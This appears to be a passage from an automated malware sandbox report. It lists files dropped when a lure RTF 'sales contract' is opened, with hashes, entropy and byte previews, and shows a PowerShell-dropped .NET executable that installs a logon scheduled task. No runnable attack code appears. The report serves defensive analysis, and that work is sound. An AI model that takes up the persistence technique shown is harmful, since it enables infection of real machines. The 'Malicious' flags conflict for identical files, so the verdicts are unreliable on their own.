SHA1:	18F3A8E4F4588435ABF2BD91BAF793B03036F5BA
SHA-256:	09F539CFBA87B19BFAFCE1EC1A5E147F96585DEE4AA5D693035917B5DE831853
SHA-512:	4B0ADAB4FEBB6CB8C3D2A8E61C3F13DDA4A600E8690D7BA8E4C820D8C3D34ACC1FDF848A68A94498CF55D80FEA2DAD81867A73698F389A4A2D91141983E9F93E
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Local\Temp\tmpA5B2.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\mum.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1580
Entropy (8bit):	5.115280404917023
Encrypted:	false
SSDEEP:	24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtMa+xvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTM/v
MD5:	F68FD447E925A59C5FEDAD28639C03B5
SHA1:	18F3A8E4F4588435ABF2BD91BAF793B03036F5BA
SHA-256:	09F539CFBA87B19BFAFCE1EC1A5E147F96585DEE4AA5D693035917B5DE831853
SHA-512:	4B0ADAB4FEBB6CB8C3D2A8E61C3F13DDA4A600E8690D7BA8E4C820D8C3D34ACC1FDF848A68A94498CF55D80FEA2DAD81867A73698F389A4A2D91141983E9F93E
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Local\Temp\tmpEFF.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\mum.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1580
Entropy (8bit):	5.115280404917023
Encrypted:	false
SSDEEP:	24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtMa+xvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTM/v
MD5:	F68FD447E925A59C5FEDAD28639C03B5
SHA1:	18F3A8E4F4588435ABF2BD91BAF793B03036F5BA
SHA-256:	09F539CFBA87B19BFAFCE1EC1A5E147F96585DEE4AA5D693035917B5DE831853
SHA-512:	4B0ADAB4FEBB6CB8C3D2A8E61C3F13DDA4A600E8690D7BA8E4C820D8C3D34ACC1FDF848A68A94498CF55D80FEA2DAD81867A73698F389A4A2D91141983E9F93E
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Revised sales contract for Crosswear.LNK

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:55 2022, mtime=Tue Mar 8 15:45:55 2022, atime=Tue Aug 23 19:42:13 2022, length=232189, window=hide
Category:	dropped
Size (bytes):	1144
Entropy (8bit):	4.585882118216553
Encrypted:	false
SSDEEP:	24:8DoOpn/XTRKJIFtbvpPeqw8HvpeDv3q/cX7cY:8DoOl/XT08bvpPZwgvpV/Kl
MD5:	3F0031D7152E93485A9CB97D737A3D96
SHA1:	1FC410B0A390021EC5CF5CD55E82E3372A9C482C
SHA-256:	FA0172E640E4DB5AA4467F42984343222CF1A4570B5F98FDD1AAC89A6DFFD972
SHA-512:	F513D775427DD9D23BE72F7F7834E0632818803A88DC34272BFBA1FCFB74AEEA89427ED98DBC23789C8E1F3B3CE0BBC8BF71A98495A66584FEB2E14733737BC9
Malicious:	false
Preview:	L..................F.... ........3.......3.../.0................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT.....&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT....._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......UG. .REVISE~1.RTF..~......hT..hT.....r.....'...............R.e.v.i.s.e.d. .s.a.l.e.s. .c.o.n.t.r.a.c.t. .f.o.r. .C.r.o.s.s.w.e.a.r...r.t.f.......................-...8...[............?J......C:\Users\..#...................\\405464\Users.user\Desktop\Revised sales contract for Crosswear.rtf.?.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.R.e.v.i.s.e.d. .s.a.l.e.s. .c.o.n.t.r.a.c.t. .f.o.r. .C.r.o.s.s.w.e.a.r...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	126
Entropy (8bit):	4.609267586138196
Encrypted:	false
SSDEEP:	3:bDuMJlvDz3dLxLO5EXLU4omxWGD4ovDz3dLxLO5EXLU4ov:bCkHtNLY+3nkovHtNLY+3y
MD5:	227889345738BE30F324D24C1591BB5C
SHA1:	C5E1934FB7FE49AAFBE7FA868521370C995F3C48
SHA-256:	4E4B976A736B9828DC58E4BEC6387749465D613AAE43AC77E932BF3509E390CB
SHA-512:	B16994B6A6CEA942D29725EADDE2AEFE156BA5CCFFE32B757FB1A5FFE0D448CFBA2C837E8811BD16942BF91641DB788830836E249BA92DC0177C85DB9E2A7F22
Malicious:	false
Preview:	[folders]..Templates.LNK=0..Revised sales contract for Crosswear.LNK=0..[misctf]..Revised sales contract for Crosswear.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.503835550707525
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
MD5:	D9C8F93ADB8834E5883B5A8AAAC0D8D9
SHA1:	23684CCAA587C442181A92E722E15A685B2407B1
SHA-256:	116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
SHA-512:	7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Little-endian UTF-16 Unicode text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\288MIHF7QY6TER3LYOAG.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5846306743376974
Encrypted:	false
SSDEEP:	96:chQCYMqUqvsqvJCwo1z8hQCYMqUqvsEHyqvJCworfzYSYxHKyuyrNTlUVLjp:c+do1z8+FHnorfzYqd+NIjp
MD5:	172117BA4DB050629809C017FA5DEE4E
SHA1:	0C81C74C76412E622676842C56850779172778B8
SHA-256:	170A57F45CF9FCE1EEC5E2BFF0020A9D5DF8E28EF9EE2067C16FCE3CD00EC580
SHA-512:	AB68126B252B12B1FE3E6D0A904E8DECA55225973B7C4825578C9761766A8706590625D2D9BAB3B04DCBAD0E04D2F3339C4A7D938A3B6A08B41538ADACB9A2F9
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT.....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5846306743376974
Encrypted:	false
SSDEEP:	96:chQCYMqUqvsqvJCwo1z8hQCYMqUqvsEHyqvJCworfzYSYxHKyuyrNTlUVLjp:c+do1z8+FHnorfzYqd+NIjp
MD5:	172117BA4DB050629809C017FA5DEE4E
SHA1:	0C81C74C76412E622676842C56850779172778B8
SHA-256:	170A57F45CF9FCE1EEC5E2BFF0020A9D5DF8E28EF9EE2067C16FCE3CD00EC580
SHA-512:	AB68126B252B12B1FE3E6D0A904E8DECA55225973B7C4825578C9761766A8706590625D2D9BAB3B04DCBAD0E04D2F3339C4A7D938A3B6A08B41538ADACB9A2F9
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT.....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\F7JY63SI2PRW2OSKRA2I.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5846306743376974
Encrypted:	false
SSDEEP:	96:chQCYMqUqvsqvJCwo1z8hQCYMqUqvsEHyqvJCworfzYSYxHKyuyrNTlUVLjp:c+do1z8+FHnorfzYqd+NIjp
MD5:	172117BA4DB050629809C017FA5DEE4E
SHA1:	0C81C74C76412E622676842C56850779172778B8
SHA-256:	170A57F45CF9FCE1EEC5E2BFF0020A9D5DF8E28EF9EE2067C16FCE3CD00EC580
SHA-512:	AB68126B252B12B1FE3E6D0A904E8DECA55225973B7C4825578C9761766A8706590625D2D9BAB3B04DCBAD0E04D2F3339C4A7D938A3B6A08B41538ADACB9A2F9
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT.....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K9JTW6TAA1IMK5CDPS3C.temp

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.587462746416652
Encrypted:	false
SSDEEP:	96:chQCYMqUqvsqvJCwo1z8hQCYMqUqvsEHyqvJCworfzjSKrnHK6HNTlUVLjp:c+do1z8+FHnorfzjn+6HNIjp
MD5:	07643C67B005B71C5DF2FC32619D99A6
SHA1:	EB3FC05187C1D26B751BCF68C786AD29F82B7204
SHA-256:	C1FE0DA81AEB8E77BEF6F5CCDDDB0EF5112E230F7704CF95E223DA775DE50940
SHA-512:	DDFF508C035812C9AE5F1CDAD485D6E5A630ED85E603F69DB5690D5C1B9214C16ABEDFFC47CD18F3F939C8C0255B7877F0B6DAB20277EDAEF742A95AE5E6F100
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT.....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\T4B3UPV0FMMO6GN0S3MI.temp

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.587462746416652
Encrypted:	false
SSDEEP:	96:chQCYMqUqvsqvJCwo1z8hQCYMqUqvsEHyqvJCworfzjSKrnHK6HNTlUVLjp:c+do1z8+FHnorfzjn+6HNIjp
MD5:	07643C67B005B71C5DF2FC32619D99A6
SHA1:	EB3FC05187C1D26B751BCF68C786AD29F82B7204
SHA-256:	C1FE0DA81AEB8E77BEF6F5CCDDDB0EF5112E230F7704CF95E223DA775DE50940
SHA-512:	DDFF508C035812C9AE5F1CDAD485D6E5A630ED85E603F69DB5690D5C1B9214C16ABEDFFC47CD18F3F939C8C0255B7877F0B6DAB20277EDAEF742A95AE5E6F100
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT.....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y7IUD6X6NDY50X1WRV4C.temp

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.587462746416652
Encrypted:	false
SSDEEP:	96:chQCYMqUqvsqvJCwo1z8hQCYMqUqvsEHyqvJCworfzjSKrnHK6HNTlUVLjp:c+do1z8+FHnorfzjn+6HNIjp
MD5:	07643C67B005B71C5DF2FC32619D99A6
SHA1:	EB3FC05187C1D26B751BCF68C786AD29F82B7204
SHA-256:	C1FE0DA81AEB8E77BEF6F5CCDDDB0EF5112E230F7704CF95E223DA775DE50940
SHA-512:	DDFF508C035812C9AE5F1CDAD485D6E5A630ED85E603F69DB5690D5C1B9214C16ABEDFFC47CD18F3F939C8C0255B7877F0B6DAB20277EDAEF742A95AE5E6F100
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT.....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZLUZMOBEG2MBD0Q9TPHB.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5846306743376974
Encrypted:	false
SSDEEP:	96:chQCYMqUqvsqvJCwo1z8hQCYMqUqvsEHyqvJCworfzYSYxHKyuyrNTlUVLjp:c+do1z8+FHnorfzYqd+NIjp
MD5:	172117BA4DB050629809C017FA5DEE4E
SHA1:	0C81C74C76412E622676842C56850779172778B8
SHA-256:	170A57F45CF9FCE1EEC5E2BFF0020A9D5DF8E28EF9EE2067C16FCE3CD00EC580
SHA-512:	AB68126B252B12B1FE3E6D0A904E8DECA55225973B7C4825578C9761766A8706590625D2D9BAB3B04DCBAD0E04D2F3339C4A7D938A3B6A08B41538ADACB9A2F9
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT.....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.587462746416652
Encrypted:	false
SSDEEP:	96:chQCYMqUqvsqvJCwo1z8hQCYMqUqvsEHyqvJCworfzjSKrnHK6HNTlUVLjp:c+do1z8+FHnorfzjn+6HNIjp
MD5:	07643C67B005B71C5DF2FC32619D99A6
SHA1:	EB3FC05187C1D26B751BCF68C786AD29F82B7204
SHA-256:	C1FE0DA81AEB8E77BEF6F5CCDDDB0EF5112E230F7704CF95E223DA775DE50940
SHA-512:	DDFF508C035812C9AE5F1CDAD485D6E5A630ED85E603F69DB5690D5C1B9214C16ABEDFFC47CD18F3F939C8C0255B7877F0B6DAB20277EDAEF742A95AE5E6F100
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT.....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exe

Download File

Process:	C:\Users\user\AppData\Roaming\mum.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	829952
Entropy (8bit):	7.980422003620349
Encrypted:	false
SSDEEP:	12288:Pu1znYPEX0k/g7Iw5O4OAA+sg7l+kwLnKsqH+OMcKDZrqlmakPDbYsu/tn1:GZY7ft/3HEKRHEZ6AbYNt
MD5:	06C16E9A1807F8754D73C6B77E978D02
SHA1:	A3B04691195895358512BCAE3658E2D10CDB2178
SHA-256:	1A87E22338388A438C836B8CF97E2C28074D3CC992879D330F68CA88B684F571
SHA-512:	4DA172D828B8AB4791E90D21FA422A12CBB09678780132822A6DD7D8107DE28615E3F1D2D575DC0A7243EC1E8E65E848C953ADD6B6867B045E20FAE3BB6801D9
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c................................. ........@.. ....................... ............@.....................................W.......\............................................................................ ............... ..H............text........ ...................... ..`.rsrc...\...........................@..@.reloc..............................@..B........................H...........9......S....`...&..........................................z.(......}.....(....o....}......0...........{............3.....(.......................0...........{......,....f.........}......}......}.......s....o....}.......}....8......{....o....}......{....}......}.............}.....{........Y}.....{....-...+H.{........{....X.{....X .;.\|.{....Xa}......}.....{....ok...:q....(....+..(........}.........(......................n..}.....{....,..{....oT.....{....*.s..

C:\Users\user\AppData\Roaming\mum.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	829952
Entropy (8bit):	7.980422003620349
Encrypted:	false
SSDEEP:	12288:Pu1znYPEX0k/g7Iw5O4OAA+sg7l+kwLnKsqH+OMcKDZrqlmakPDbYsu/tn1:GZY7ft/3HEKRHEZ6AbYNt
MD5:	06C16E9A1807F8754D73C6B77E978D02
SHA1:	A3B04691195895358512BCAE3658E2D10CDB2178
SHA-256:	1A87E22338388A438C836B8CF97E2C28074D3CC992879D330F68CA88B684F571
SHA-512:	4DA172D828B8AB4791E90D21FA422A12CBB09678780132822A6DD7D8107DE28615E3F1D2D575DC0A7243EC1E8E65E848C953ADD6B6867B045E20FAE3BB6801D9
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c................................. ........@.. ....................... ............@.....................................W.......\............................................................................ ............... ..H............text........ ...................... ..`.rsrc...\...........................@..@.reloc..............................@..B........................H...........9......S....`...&..........................................z.(......}.....(....o....}......0...........{............3.....(.......................0...........{......,....f.........}......}......}.......s....o....}.......}....8......{....o....}......{....}......}.............}.....{........Y}.....{....-...+H.{........{....X.{....X .;.\|.{....Xa}......}.....{....ok...:q....(....+..(........}.........(......................n..}.....{....,..{....oT.....{....*.s..

C:\Users\user\Desktop\~$vised sales contract for Crosswear.rtf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
